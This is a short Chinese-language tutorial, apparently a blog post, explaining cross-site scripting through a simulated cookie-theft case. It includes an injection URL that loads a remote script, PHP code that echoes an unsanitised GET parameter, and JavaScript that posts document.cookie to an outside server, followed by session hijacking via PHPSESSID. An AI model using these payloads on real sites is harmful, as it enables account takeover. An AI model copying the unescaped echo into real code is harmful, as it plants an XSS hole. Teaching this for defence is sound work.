1.什么是xss攻击?
XSS攻击的全称是跨站脚本攻击,是Web应用程序中最常见到的攻击手段。跨站脚本攻击指的是攻击者在网页中嵌入恶意脚本程序,当用户打开该网页时,脚本程序便开始在客户端的浏览器上运行,便于获取cookie,用户名密码。
2.案例 (以下通过模拟说明,切勿用于非法用途否则后果自负)
通过xss攻击获取客户的cookie,并且直接登录他的账号。
首先通过get传参数注入js脚本例如
http://link.wlphp.com/?xss=%3Cscript%20src=%22https://www.wlphp.com/test/xss.js%22%3E%3C/script%3E
然后恰巧网站的业务代码里面有输出这个参数值到html里面的部分,比如如下代码。
<?php @isset($_GET['xss'])?$_SESSION['xss']=$_GET['xss']:"" ?>
<?php echo $_SESSION['xss']; ?>
查看源代码如下:
这样查看网页源代码的时候就会发现里面有一段script标签,黑客嵌入一个远程的自己的js,自己的js内容如下
var cookie=document.cookie; $.post("http://appwarn.wlphp.com/api.php?str="+cookie,{},function (data){ console.log(data); });
然后js里面获取客户的cookie然后通过ajax传走到自己的服务器。
黑客通过接受到的cookie就能登录他的账号了。
可以使用火狐浏览器更改phpsessionid对应的值即可
